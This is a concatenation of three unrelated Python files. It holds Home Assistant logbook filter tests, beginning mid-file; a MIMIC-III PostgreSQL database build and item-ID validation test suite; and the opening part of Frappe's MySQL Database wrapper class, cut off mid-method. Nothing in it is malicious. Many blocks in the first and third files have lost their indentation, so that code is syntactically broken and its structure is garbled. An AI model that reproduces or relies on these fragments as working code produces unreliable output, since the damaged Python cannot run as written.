    excluded = 'switch.bla'
    included = 'sensor.blu'
    point_a = dt_util.utcnow()
    point_b = point_a + timedelta(minutes=logbook.GROUP_BY_MINUTES)

    event_a = self.create_state_changed_event(point_a, excluded, 10)
    event_b = self.create_state_changed_event(point_b, included, 20)

    config = logbook.CONFIG_SCHEMA({
        ha.DOMAIN: {},
        logbook.DOMAIN: {logbook.CONF_EXCLUDE: {
            logbook.CONF_DOMAINS: ['switch', ]}}})
    events = logbook._exclude_events(
        (ha.Event(EVENT_HOMEASSISTANT_START), event_a, event_b), config)
    entries = list(logbook.humanify(events))

    # The whole switch domain is excluded; startup entry and the
    # sensor entity survive.
    self.assertEqual(2, len(entries))
    self.assert_entry(entries[0], name='Home Assistant',
                      message='started', domain=ha.DOMAIN)
    self.assert_entry(entries[1], point_b, 'blu', domain='sensor',
                      entity_id=included)
def test_exclude_automation_events(self):
"""Test if automation entries can be excluded by entity_id."""
name = 'My Automation Rule'
message = 'has been triggered'
domain = 'automation'
entity_id = 'automation.my_automation_rule'
entity_id2 = 'automation.my_automation_rule_2'
entity_id2 = 'sensor.blu'
eventA = ha.Event(logbook.EVENT_LOGBOOK_ENTRY, {
logbook.ATTR_NAME: name,
logbook.ATTR_MESSAGE: message,
logbook.ATTR_DOMAIN: domain,
logbook.ATTR_ENTITY_ID: entity_id,
})
eventB = ha.Event(logbook.EVENT_LOGBOOK_ENTRY, {
logbook.ATTR_NAME: name,
logbook.ATTR_MESSAGE: message,
logbook.ATTR_DOMAIN: domain,
logbook.ATTR_ENTITY_ID: entity_id2,
})
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_EXCLUDE: {
logbook.CONF_ENTITIES: [entity_id, ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_STOP),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='stopped',
domain=ha.DOMAIN)
self.assert_entry(
entries[1], name=name, domain=domain, entity_id=entity_id2)
def test_include_events_entity(self):
"""Test if events are filtered if entity is included in config."""
entity_id = 'sensor.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_INCLUDE: {
logbook.CONF_ENTITIES: [entity_id2, ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_STOP),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='stopped',
domain=ha.DOMAIN)
self.assert_entry(
entries[1], pointB, 'blu', domain='sensor', entity_id=entity_id2)
def test_include_events_domain(self):
"""Test if events are filtered if domain is included in config."""
entity_id = 'switch.bla'
entity_id2 = 'sensor.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {logbook.CONF_INCLUDE: {
logbook.CONF_DOMAINS: ['sensor', ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_START),
eventA, eventB), config)
entries = list(logbook.humanify(events))
self.assertEqual(2, len(entries))
self.assert_entry(entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointB, 'blu', domain='sensor',
entity_id=entity_id2)
def test_include_exclude_events(self):
"""Test if events are filtered if include and exclude is configured."""
entity_id = 'switch.bla'
entity_id2 = 'sensor.blu'
entity_id3 = 'sensor.bli'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=logbook.GROUP_BY_MINUTES)
eventA1 = self.create_state_changed_event(pointA, entity_id, 10)
eventA2 = self.create_state_changed_event(pointA, entity_id2, 10)
eventA3 = self.create_state_changed_event(pointA, entity_id3, 10)
eventB1 = self.create_state_changed_event(pointB, entity_id, 20)
eventB2 = self.create_state_changed_event(pointB, entity_id2, 20)
config = logbook.CONFIG_SCHEMA({
ha.DOMAIN: {},
logbook.DOMAIN: {
logbook.CONF_INCLUDE: {
logbook.CONF_DOMAINS: ['sensor', ],
logbook.CONF_ENTITIES: ['switch.bla', ]},
logbook.CONF_EXCLUDE: {
logbook.CONF_DOMAINS: ['switch', ],
logbook.CONF_ENTITIES: ['sensor.bli', ]}}})
events = logbook._exclude_events((ha.Event(EVENT_HOMEASSISTANT_START),
eventA1, eventA2, eventA3,
eventB1, eventB2), config)
entries = list(logbook.humanify(events))
self.assertEqual(3, len(entries))
self.assert_entry(entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointA, 'blu', domain='sensor',
entity_id=entity_id2)
self.assert_entry(entries[2], pointB, 'blu', domain='sensor',
entity_id=entity_id2)
def test_exclude_auto_groups(self):
"""Test if events of automatically generated groups are filtered."""
entity_id = 'switch.bla'
entity_id2 = 'group.switches'
pointA = dt_util.utcnow()
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(pointA, entity_id2, 20,
{'auto': True})
entries = list(logbook.humanify((eventA, eventB)))
self.assertEqual(1, len(entries))
self.assert_entry(entries[0], pointA, 'bla', domain='switch',
entity_id=entity_id)
def test_exclude_attribute_changes(self):
"""Test if events of attribute changes are filtered."""
entity_id = 'switch.bla'
entity_id2 = 'switch.blu'
pointA = dt_util.utcnow()
pointB = pointA + timedelta(minutes=1)
eventA = self.create_state_changed_event(pointA, entity_id, 10)
eventB = self.create_state_changed_event(
pointA, entity_id2, 20, last_changed=pointA, last_updated=pointB)
entries = list(logbook.humanify((eventA, eventB)))
self.assertEqual(1, len(entries))
self.assert_entry(entries[0], pointA, 'bla', domain='switch',
entity_id=entity_id)
def test_entry_to_dict(self):
"""Test conversion of entry to dict."""
entry = logbook.Entry(
dt_util.utcnow(), 'Alarm', 'is triggered', 'switch', 'test_switch'
)
data = entry.as_dict()
self.assertEqual('Alarm', data.get(logbook.ATTR_NAME))
self.assertEqual('is triggered', data.get(logbook.ATTR_MESSAGE))
self.assertEqual('switch', data.get(logbook.ATTR_DOMAIN))
self.assertEqual('test_switch', data.get(logbook.ATTR_ENTITY_ID))
def test_home_assistant_start_stop_grouped(self):
"""Test if HA start and stop events are grouped.
Events that are occuring in the same minute.
"""
entries = list(logbook.humanify((
ha.Event(EVENT_HOMEASSISTANT_STOP),
ha.Event(EVENT_HOMEASSISTANT_START),
)))
self.assertEqual(1, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='restarted',
domain=ha.DOMAIN)
def test_home_assistant_start(self):
"""Test if HA start is not filtered or converted into a restart."""
entity_id = 'switch.bla'
pointA = dt_util.utcnow()
entries = list(logbook.humanify((
ha.Event(EVENT_HOMEASSISTANT_START),
self.create_state_changed_event(pointA, entity_id, 10)
)))
self.assertEqual(2, len(entries))
self.assert_entry(
entries[0], name='Home Assistant', message='started',
domain=ha.DOMAIN)
self.assert_entry(entries[1], pointA, 'bla', domain='switch',
entity_id=entity_id)
def test_entry_message_from_state_device(self):
"""Test if logbook message is correctly created for switches.
Especially test if the special handling for turn on/off events is done.
"""
pointA = dt_util.utcnow()
# message for a device state change
eventA = self.create_state_changed_event(pointA, 'switch.bla', 10)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('changed to 10', message)
# message for a switch turned on
eventA = self.create_state_changed_event(pointA, 'switch.bla',
STATE_ON)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('turned on', message)
# message for a switch turned off
eventA = self.create_state_changed_event(pointA, 'switch.bla',
STATE_OFF)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('turned off', message)
def test_entry_message_from_state_device_tracker(self):
"""Test if logbook message is correctly created for device tracker."""
pointA = dt_util.utcnow()
# message for a device tracker "not home" state
eventA = self.create_state_changed_event(pointA, 'device_tracker.john',
STATE_NOT_HOME)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('is away', message)
# message for a device tracker "home" state
eventA = self.create_state_changed_event(pointA, 'device_tracker.john',
'work')
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('is at work', message)
def test_entry_message_from_state_sun(self):
"""Test if logbook message is correctly created for sun."""
pointA = dt_util.utcnow()
# message for a sun rise
eventA = self.create_state_changed_event(pointA, 'sun.sun',
sun.STATE_ABOVE_HORIZON)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('has risen', message)
# message for a sun set
eventA = self.create_state_changed_event(pointA, 'sun.sun',
sun.STATE_BELOW_HORIZON)
to_state = ha.State.from_dict(eventA.data.get('new_state'))
message = logbook._entry_message_from_state(to_state.domain, to_state)
self.assertEqual('has set', message)
def test_process_custom_logbook_entries(self):
"""Test if custom log book entries get added as an entry."""
name = 'Nice name'
message = 'has a custom entry'
entity_id = 'sun.sun'
entries = list(logbook.humanify((
ha.Event(logbook.EVENT_LOGBOOK_ENTRY, {
logbook.ATTR_NAME: name,
logbook.ATTR_MESSAGE: message,
logbook.ATTR_ENTITY_ID: entity_id,
}),
)))
self.assertEqual(1, len(entries))
self.assert_entry(
entries[0], name=name, message=message,
domain='sun', entity_id=entity_id)
def assert_entry(self, entry, when=None, name=None, message=None,
domain=None, entity_id=None):
"""Assert an entry is what is expected."""
if when:
self.assertEqual(when, entry.when)
if name:
self.assertEqual(name, entry.name)
if message:
self.assertEqual(message, entry.message)
if domain:
self.assertEqual(domain, entry.domain)
if entity_id:
self.assertEqual(entity_id, entry.entity_id)
def create_state_changed_event(self, event_time_fired, entity_id, state,
attributes=None, last_changed=None,
last_updated=None):
"""Create state changed event."""
# Logbook only cares about state change events that
# contain an old state but will not actually act on it.
state = ha.State(entity_id, state, attributes, last_changed,
last_updated).as_dict()
return ha.Event(EVENT_STATE_CHANGED, {
'entity_id': entity_id,
'old_state': state,
'new_state': state,
}, time_fired=event_time_fired)
|
|
import unittest
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
import pandas as pd
import os
from subprocess import call
# Prep for Oracle and MySQL database connection
# http://stackoverflow.com/questions/10065051/python-pandas-and-databases-like-mysql
# import cx_Oracle
# import MySQLdb
# Config
# Connection settings for the local PostgreSQL server used by the tests.
psqluser = 'postgres'
testdbname = 'mimic_test_db'
hostname = 'localhost'
# Small sample data shipped with the repository (used off the build server).
datadir = 'testdata/v1_3/'
schema = 'mimiciii'
# Set paths for scripts to be tested
curpath = os.path.join(os.path.dirname(__file__)) + '/'
# Display environment variables
print(os.environ)
# Create dictionary with table details for use in testing
# Expected row counts per table for the *full* MIMIC-III v1.3 dataset;
# only verified when running against the complete data (Jenkins build).
row_dict = {
    "ADMISSIONS": 58976,
    "CALLOUT": 34499,
    "CAREGIVERS": 7567,
    "CHARTEVENTS": 263201375,
    "CPTEVENTS": 573146,
    "D_CPT": 134,
    "D_ICD_DIAGNOSES": 14567,
    "D_ICD_PROCEDURES": 3882,
    "D_ITEMS": 12478,
    "D_LABITEMS": 755,
    "DATETIMEEVENTS": 4486049,
    "DIAGNOSES_ICD": 651047,
    "DRGCODES": 125557,
    "ICUSTAYS": 61532,
    "INPUTEVENTS_CV": 17528894,
    "INPUTEVENTS_MV": 3618991,
    "LABEVENTS": 27872575,
    "MICROBIOLOGYEVENTS": 328446,
    "NOTEEVENTS": 2078705,
    "OUTPUTEVENTS": 4349339,
    "PATIENTS": 46520,
    "PRESCRIPTIONS": 4156848,
    "PROCEDUREEVENTS_MV": 258066,
    "PROCEDURES_ICD": 240095,
    "SERVICES": 73343,
    "TRANSFERS": 261897 }
# # Load build scripts
# def executescripts(filename):
# # Open and read the file as a single buffer
# fd = open(filename, 'r')
# sqlFile = fd.read()
# fd.close()
# # all SQL commands (split on ';')
# sqlcommands = sqlFile.split(';')
# # Execute every command from the input file
# for command in sqlcommands:
# # This will skip and report errors
# # For example, if the tables do not yet exist, this will skip over
# # the DROP TABLE commands
# try:
# c.execute(command)
# except OperationalError, msg:
# print "Command skipped: ", msg
def run_postgres_build_scripts(cur):
    """Build the MIMIC-III schema on the test database.

    Creates the tables, loads the data, then adds constraints and indexes.
    `cur` is an open psycopg2 cursor on the test database; the data load
    is shelled out to `psql` so the client-side copy commands in the load
    script work.
    """
    # Create tables
    fn = curpath + '../buildmimic/postgres/postgres_create_tables.sql'
    # `with` closes the script file promptly (was a leaked file handle)
    with open(fn, 'r') as f:
        cur.execute(f.read())
    # Load data: full dataset on the Jenkins build server, otherwise the
    # small test data shipped with the repository.
    # `'USER' in os.environ` replaces the Python-2-only `has_key`.
    fn = curpath + '../buildmimic/postgres/postgres_load_data.sql'
    if 'USER' in os.environ and os.environ['USER'] == 'jenkins':
        mimic_data_dir = '/home/mimicadmin/data/mimiciii_1_3/'
    else:
        mimic_data_dir = curpath + datadir
    call(['psql', '-f', fn, '-d', testdbname, '-U', psqluser,
          '-v', 'mimic_data_dir=' + mimic_data_dir])
    # Add constraints
    fn = curpath + '../buildmimic/postgres/postgres_add_constraints.sql'
    with open(fn, 'r') as f:
        cur.execute(f.read())
    # Add indexes
    fn = curpath + '../buildmimic/postgres/postgres_add_indexes.sql'
    with open(fn, 'r') as f:
        cur.execute(f.read())
# # Prep for adding MySQL build
# def run_mysql_build_scripts(cur):
# # Create tables
# fn = curpath + '../buildmimic/mysql/mysql_create_tables.sql'
# cur.execute(open(fn, "r").read())
# # Loads data
# fn = curpath + '../buildmimic/mysql/mysql_load_data.sql'
# if os.environ.has_key('USER') and os.environ['USER'] == 'jenkins':
# # use full dataset
# mimic_data_dir = '/home/mimicadmin/data/mimiciii_1_3/'
# else:
# mimic_data_dir = curpath+datadir
# call(['psql','-f',fn,'-d',testdbname,'-U',psqluser,'-v','mimic_data_dir='+mimic_data_dir])
# # Add constraints
# fn = curpath + '../buildmimic/mysql/mysql_add_constraints.sql'
# cur.execute(open(fn, "r").read())
# # Add indexes
# fn = curpath + '../buildmimic/mysql/mysql_add_indexes.sql'
# cur.execute(open(fn, "r").read())
# Class to run unit tests
class test_postgres(unittest.TestCase):
    """Build the MIMIC test database once, run validation queries, drop it."""

    # setUpClass runs once for the class
    @classmethod
    def setUpClass(cls):
        # Connect to default postgres database
        cls.con = psycopg2.connect(dbname='postgres', user=psqluser)
        cls.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
        cls.cur = cls.con.cursor()
        # Create test database, dropping any leftover copy from a failed run
        try:
            cls.cur.execute('DROP DATABASE ' + testdbname)
        except psycopg2.ProgrammingError:
            pass
        cls.cur.execute('CREATE DATABASE ' + testdbname)
        cls.cur.close()
        cls.con.close()
        # Connect to the test database
        cls.con = psycopg2.connect(dbname=testdbname, user=psqluser)
        cls.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
        cls.cur = cls.con.cursor()
        # Build the test database
        run_postgres_build_scripts(cls.cur)
        cls.cur.close()
        cls.con.close()

    # tearDownClass runs once for the class
    @classmethod
    def tearDownClass(cls):
        # Connect to default postgres database
        cls.con = psycopg2.connect(dbname='postgres', user=psqluser)
        cls.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
        cls.cur = cls.con.cursor()
        # Drop test database
        cls.cur.execute('DROP DATABASE ' + testdbname)
        cls.cur.close()
        cls.con.close()

    # setUp runs once for each test method
    def setUp(self):
        # Connect to the test database
        self.con = psycopg2.connect(dbname=testdbname, user=psqluser)
        self.con.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
        self.cur = self.con.cursor()

    # tearDown runs once for each test method
    def tearDown(self):
        self.cur.close()
        self.con.close()

    # The MIMIC test db has been created by this point
    # Add unit tests below
    def test_run_sample_query(self):
        test_query = """
        SELECT 'hello world';
        """
        hello_world = pd.read_sql_query(test_query,self.con)
        self.assertEqual(hello_world.values[0][0],'hello world')

    def test_testddl(self):
        # Creates and drops an example schema and table
        fn = curpath + 'testddl.sql'
        self.cur.execute(open(fn, "r").read())
        # self.assertEqual(1,1)

    # --------------------------------------------------
    # Run a series of checks to ensure ITEMIDs are valid
    # All checks should return 0.
    # --------------------------------------------------
    def test_itemids_in_inputevents_cv_are_shifted(self):
        query = """
        -- prompt Number of ITEMIDs which were erroneously left as original value
        select count(*) from mimiciii.inputevents_cv
        where itemid < 30000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_inputevents_mv_are_shifted(self):
        query = """
        -- prompt Number of ITEMIDs which were erroneously left as original value
        select count(*) from mimiciii.inputevents_mv
        where itemid < 220000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_outputevents_are_shifted(self):
        query = """
        -- prompt Number of ITEMIDs which were erroneously left as original value
        select count(*) from mimiciii.outputevents
        where itemid < 30000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_inputevents_cv_are_in_range(self):
        query = """
        -- prompt Number of ITEMIDs which are above the allowable range
        select count(*) from mimiciii.inputevents_cv
        where itemid > 50000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_outputevents_are_in_range(self):
        query = """
        -- prompt Number of ITEMIDs which are not in the allowable range
        select count(*) from mimiciii.outputevents
        where itemid > 50000 and itemid < 220000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_chartevents_are_in_range(self):
        query = """
        -- prompt Number of ITEMIDs which are not in the allowable range
        select count(*) from mimiciii.chartevents
        where itemid > 20000 AND itemid < 220000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_procedureevents_mv_are_in_range(self):
        query = """
        -- prompt Number of ITEMIDs which are not in the allowable range
        select count(*) from mimiciii.procedureevents_mv
        where itemid < 220000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_labevents_are_in_range(self):
        query = """
        -- prompt Number of ITEMIDs which are not in the allowable range
        select count(*) from mimiciii.labevents
        where itemid < 50000 or itemid > 60000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    def test_itemids_in_microbiologyevents_are_in_range(self):
        query = """
        -- prompt Number of ITEMIDs which are not in the allowable range
        select count(*) from mimiciii.microbiologyevents
        where SPEC_ITEMID < 70000 or SPEC_ITEMID > 80000
        or ORG_ITEMID < 80000 or ORG_ITEMID > 90000
        or AB_ITEMID < 90000 or AB_ITEMID > 100000;
        """
        queryresult = pd.read_sql_query(query,self.con)
        self.assertEqual(queryresult.values[0][0],0)

    # ----------------------------------------------------
    # RUN THE FOLLOWING TESTS ON THE FULL DATASET ONLY ---
    # ----------------------------------------------------
    # `'USER' in os.environ` replaces the Python-2-only `has_key`.
    if 'USER' in os.environ and os.environ['USER'] == 'jenkins':
        def test_row_counts_are_as_expected(self):
            # .items() works on both Python 2 and 3 (was .iteritems())
            for tablename, expectedrows in row_dict.items():
                query = "SELECT COUNT(*) FROM " + schema + "." + tablename + ";"
                queryresult = pd.read_sql_query(query,self.con)
                self.assertEqual(queryresult.values[0][0],expectedrows)

        def test_age_and_los_is_expected(self):
            query = \
            """
            WITH icuadmissions as (
            SELECT a.subject_id, a.hadm_id, i.icustay_id,
            a.admittime as hosp_admittime, a.dischtime as hosp_dischtime,
            i.first_careunit,
            DENSE_RANK() over(PARTITION BY a.hadm_id ORDER BY i.intime ASC) as icu_seq,
            p.dob, p.dod, i.intime as icu_intime, i.outtime as icu_outtime,
            i.los as icu_los,
            round((EXTRACT(EPOCH FROM (a.dischtime-a.admittime))/60/60/24) :: NUMERIC, 4) as hosp_los,
            p.gender,
            round((EXTRACT(EPOCH FROM (a.admittime-p.dob))/60/60/24/365.242) :: NUMERIC, 4) as age_hosp_in,
            round((EXTRACT(EPOCH FROM (i.intime-p.dob))/60/60/24/365.242) :: NUMERIC, 4) as age_icu_in,
            hospital_expire_flag,
            CASE WHEN p.dod IS NOT NULL
            AND p.dod >= i.intime - interval '6 hour'
            AND p.dod <= i.outtime + interval '6 hour' THEN 1
            ELSE 0 END AS icu_expire_flag
            FROM admissions a
            INNER JOIN icustays i
            ON a.hadm_id = i.hadm_id
            INNER JOIN patients p
            ON a.subject_id = p.subject_id
            ORDER BY a.subject_id, i.intime)
            SELECT round(avg(age_icu_in)) as avg_age_icu,
            round(avg(hosp_los)) as avg_los_hosp,
            round(avg(icu_los)) as avg_los_icu
            FROM icuadmissions;
            """
            queryresult = pd.read_sql_query(query,self.con)
            # BUG FIX: Series.values is a 1-D array, so the previous
            # `.values[0][0]` raised IndexError on the scalar element.
            self.assertEqual(queryresult['avg_age_icu'].values[0],65)
            self.assertEqual(queryresult['avg_los_hosp'].values[0],11)
            self.assertEqual(queryresult['avg_los_icu'].values[0],5)
def main():
    """Entry point: run the full unittest suite in this module."""
    unittest.main()
# Run the tests when executed as a script
if __name__ == '__main__':
    main()
|
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# Database Module
# --------------------
from __future__ import unicode_literals
import MySQLdb
from markdown2 import UnicodeWithAttrs
import warnings
import datetime
import frappe
import re
import frappe.model.meta
from frappe.utils import now, get_datetime
from frappe import _
class Database:
"""
Open a database connection with the given parmeters, if use_default is True, use the
login details from `conf.py`. This is called by the request handler and is accessible using
the `db` global variable. the `sql` method is also global to run queries
"""
	def __init__(self, host=None, user=None, password=None, ac_name=None, use_default = 0):
		# Fall back to the site config (`frappe.conf`) for anything not given.
		self.host = host or frappe.conf.db_host or 'localhost'
		# NOTE: in this setup the DB user name doubles as the DB name.
		self.user = user or frappe.conf.db_name
		self._conn = None
		if ac_name:
			self.user = self.get_db_login(ac_name) or frappe.conf.db_name
		if use_default:
			self.user = frappe.conf.db_name
		# counts INSERT/UPDATE statements in the current transaction
		self.transaction_writes = 0
		self.auto_commit_on_many_writes = 0
		self.password = password or frappe.conf.db_password
	def get_db_login(self, ac_name):
		# Trivial mapping: the account name is used directly as the DB login.
		return ac_name
	def connect(self):
		"""
		Connect to a database
		"""
		# silence MySQL warnings raised during execute (e.g. truncation)
		warnings.filterwarnings('ignore', category=MySQLdb.Warning)
		self._conn = MySQLdb.connect(user=self.user, host=self.host, passwd=self.password,
			use_unicode=True, charset='utf8')
		# MySQL field type 246 (NEWDECIMAL) -> float, 12 (DATETIME) -> datetime
		self._conn.converter[246]=float
		self._conn.converter[12]=get_datetime
		# escape markdown2's UnicodeWithAttrs like a plain unicode string
		self._conn.encoders[UnicodeWithAttrs] = self._conn.encoders[unicode]
		self._cursor = self._conn.cursor()
		if self.user != 'root':
			self.use(self.user)
		frappe.local.rollback_observers = []
	def use(self, db_name):
		"""
		`USE` db_name
		"""
		self._conn.select_db(db_name)
		# remember the active database for callers
		self.cur_db_name = db_name
def validate_query(self, q):
cmd = q.strip().lower().split()[0]
if cmd in ['alter', 'drop', 'truncate'] and frappe.user.name != 'Administrator':
frappe.throw(_("Not permitted"), frappe.PermissionError)
	def sql(self, query, values=(), as_dict = 0, as_list = 0, formatted = 0,
		debug=0, ignore_ddl=0, as_utf8=0, auto_commit=0, update=None):
		"""
		* Execute a `query`, with given `values`
		* returns as a dictionary if as_dict = 1
		* returns as a list of lists (with cleaned up dates) if as_list = 1
		* `debug` prints the query and its EXPLAIN plan to the error log
		* `ignore_ddl` swallows missing table/column errors
		* `update` is merged into every returned dict when as_dict = 1
		"""
		if not self._conn:
			self.connect()
		# in transaction validations
		self.check_transaction_status(query)
		# autocommit
		if auto_commit: self.commit()
		# execute
		try:
			if values!=():
				if isinstance(values, dict):
					values = dict(values)
				# MySQL-python==1.2.5 hack!
				# wrap a bare scalar so the driver treats it as one parameter
				if not isinstance(values, (dict, tuple, list)):
					values = (values,)
				if debug:
					try:
						self.explain_query(query, values)
						frappe.errprint(query % values)
					except TypeError:
						frappe.errprint([query, values])
				if (frappe.conf.get("logging") or False)==2:
					frappe.log("<<<< query")
					frappe.log(query)
					frappe.log("with values:")
					frappe.log(values)
					frappe.log(">>>>")
				self._cursor.execute(query, values)
			else:
				if debug:
					self.explain_query(query)
					frappe.errprint(query)
				if (frappe.conf.get("logging") or False)==2:
					frappe.log("<<<< query")
					frappe.log(query)
					frappe.log(">>>>")
				self._cursor.execute(query)
		except Exception, e:
			# ignore data definition errors
			# 1146: table missing, 1054: unknown column, 1091: can't drop
			if ignore_ddl and e.args[0] in (1146,1054,1091):
				pass
			else:
				raise
		if auto_commit: self.commit()
		# scrub output if required
		if as_dict:
			ret = self.fetch_as_dict(formatted, as_utf8)
			if update:
				for r in ret:
					r.update(update)
			return ret
		elif as_list:
			return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
		elif as_utf8:
			return self.convert_to_lists(self._cursor.fetchall(), formatted, as_utf8)
		else:
			return self._cursor.fetchall()
def explain_query(self, query, values=None):
try:
frappe.errprint("--- query explain ---")
if values is None:
self._cursor.execute("explain " + query)
else:
self._cursor.execute("explain " + query, values)
import json
frappe.errprint(json.dumps(self.fetch_as_dict(), indent=1))
frappe.errprint("--- query explain end ---")
except:
frappe.errprint("error in query explain")
def sql_list(self, query, values=(), debug=False):
return [r[0] for r in self.sql(query, values, debug=debug)]
	def sql_ddl(self, query, values=()):
		"""Commit the open transaction, then run a DDL `query`.
		NOTE: `values` is accepted but never forwarded to `sql`, so any
		parameters in `query` are silently ignored."""
		self.commit()
		self.sql(query)
def check_transaction_status(self, query):
if self.transaction_writes and \
query and query.strip().split()[0].lower() in ['start', 'alter', 'drop', 'create', "begin"]:
raise Exception, 'This statement can cause implicit commit'
if query and query.strip().lower() in ('commit', 'rollback'):
self.transaction_writes = 0
if query[:6].lower() in ['update', 'insert']:
self.transaction_writes += 1
if self.transaction_writes > 20000:
if self.auto_commit_on_many_writes:
frappe.db.commit()
else:
frappe.throw(_("Too many writes in one request. Please send smaller requests"), frappe.ValidationError)
	def fetch_as_dict(self, formatted=0, as_utf8=0):
		"""Fetch all rows from the open cursor as a list of frappe._dict,
		keyed by the column names from the cursor description."""
		result = self._cursor.fetchall()
		ret = []
		# decide once per result set whether values need type conversion
		needs_formatting = self.needs_formatting(result, formatted)
		for r in result:
			row_dict = frappe._dict({})
			for i in range(len(r)):
				if needs_formatting:
					val = self.convert_to_simple_type(r[i], formatted)
				else:
					val = r[i]
				if as_utf8 and type(val) is unicode:
					val = val.encode('utf-8')
				row_dict[self._cursor.description[i][0]] = val
			ret.append(row_dict)
		return ret
	def needs_formatting(self, result, formatted):
		"""Return True if any value in the first row would be changed by
		convert_to_simple_type (dates/times/longs, or any number when
		`formatted` is set); False otherwise.
		Only the first row is inspected, on the assumption that all rows
		share the same column types."""
		if result and result[0]:
			for v in result[0]:
				if isinstance(v, (datetime.date, datetime.timedelta, datetime.datetime, long)):
					return True
				if formatted and isinstance(v, (int, float)):
					return True
		return False
	def get_description(self):
		"""Return the cursor description of the last executed query."""
		return self._cursor.description
	def convert_to_simple_type(self, v, formatted=0):
		"""Convert DB-native values (dates, times, longs) to plain types;
		with `formatted`, also render dates and numbers for display."""
		from frappe.utils import formatdate, fmt_money
		if isinstance(v, (datetime.date, datetime.timedelta, datetime.datetime, long)):
			if isinstance(v, datetime.date):
				v = unicode(v)
				if formatted:
					v = formatdate(v)
			# time
			elif isinstance(v, (datetime.timedelta, datetime.datetime)):
				v = unicode(v)
			# long
			elif isinstance(v, long):
				v=int(v)
		# convert to strings... (if formatted)
		if formatted:
			if isinstance(v, float):
				v=fmt_money(v)
			elif isinstance(v, int):
				v = unicode(v)
		return v
	def convert_to_lists(self, res, formatted=0, as_utf8=0):
		"""Return `res` (a sequence of DB rows) as a list of lists, with
		values passed through convert_to_simple_type when needed and
		optionally encoded to utf-8 byte strings."""
		nres = []
		# decide once per result set whether values need type conversion
		needs_formatting = self.needs_formatting(res, formatted)
		for r in res:
			nr = []
			for c in r:
				if needs_formatting:
					val = self.convert_to_simple_type(c, formatted)
				else:
					val = c
				if as_utf8 and type(val) is unicode:
					val = val.encode('utf-8')
				nr.append(val)
			nres.append(nr)
		return nres
	def convert_to_utf8(self, res, formatted=0):
		"""Return `res` as a list of lists with every unicode value encoded
		to a utf-8 byte string and other values simplified."""
		nres = []
		for r in res:
			nr = []
			for c in r:
				if type(c) is unicode:
					c = c.encode('utf-8')
				nr.append(self.convert_to_simple_type(c, formatted))
			nres.append(nr)
		return nres
	def build_conditions(self, filters):
		"""Build an SQL WHERE clause from a filters dict (or a string,
		treated as {"name": filters}).  Returns (conditions, filters),
		where `conditions` uses %(key)s placeholders resolved against the
		(possibly rewritten) `filters` mapping."""
		def _build_condition(key):
			"""
			filter's key is passed by map function
			build conditions like:
			* ifnull(`fieldname`, default_value) = %(fieldname)s
			* `fieldname` [=, !=, >, >=, <, <=] %(fieldname)s
			"""
			_operator = "="
			value = filters.get(key)
			# a (operator, operand) tuple/list selects a custom comparator
